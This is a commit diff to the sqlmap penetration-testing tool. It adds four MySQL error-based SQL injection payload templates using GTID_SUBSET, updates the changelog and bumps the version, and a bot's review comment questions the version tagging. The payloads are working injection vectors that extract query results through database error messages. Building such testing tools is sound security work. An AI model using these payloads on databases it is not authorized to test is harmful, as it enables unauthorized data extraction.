Adding new payload (credits: blackfan.ru)
parent
67f918f6ad
commit
6b7a1dfd94
|
@ -91,6 +91,46 @@
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3,8,9</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
<dbms_version>>= 5.6</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>3</risk>
|
||||||
|
<clause>1,8,9</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
<dbms_version>>= 5.6</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
|
<title>MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
|
@ -886,6 +926,26 @@
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,2,3,9</clause>
|
||||||
|
<where>3</where>
|
||||||
|
<vector>GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
<dbms_version>>= 5.6</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
|
<title>MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
|
@ -1155,6 +1215,26 @@
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
<dbms_version>>= 5.6</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
|
<title>MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
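Review bot: The `<dbms_version>>= 5.6</dbms_version>` tag and the `MySQL >= 5.6` titles on the added GTID_SUBSET tests look broader than the function's real availability. As far as I know the GTID functions first shipped in MySQL 5.6.5, and MariaDB, which is commonly fingerprinted alongside MySQL, does not implement `GTID_SUBSET` at all; both are worth confirming against the vendor documentation. Consider tightening the title and tag to `>= 5.6.5`, matching the precision of the neighbouring `>= 5.7.8` JSON_KEYS entries, and adding an XML comment such as `<!-- MySQL only; GTID_SUBSET is not available on MariaDB -->`. That way a negative result from these tests is not read in a scan report as evidence that the parameter is safe. The same applies to the entries added in all three hunks (at -91, -886 and -1155).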
|
||||||
|
|
|
@ -6,14 +6,17 @@
|
||||||
# Version 1.3 (2019-01-05)
|
# Version 1.3 (2019-01-05)
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
|
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
|
||||||
|
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
|
||||||
|
|
||||||
# Version 1.2 (2018-01-08)
|
# Version 1.2 (2018-01-08)
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
|
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
|
||||||
|
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
|
||||||
|
|
||||||
# Version 1.1 (2017-04-07)
|
# Version 1.1 (2017-04-07)
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
|
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
|
||||||
|
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
|
||||||
|
|
||||||
# Version 1.0 (2016-02-27)
|
# Version 1.0 (2016-02-27)
|
||||||
|
|
||||||
|
|
|
@ -18,7 +18,7 @@ from lib.core.enums import OS
|
||||||
from thirdparty.six import unichr as _unichr
|
from thirdparty.six import unichr as _unichr
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.4.7.4"
|
VERSION = "1.4.7.5"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
|
|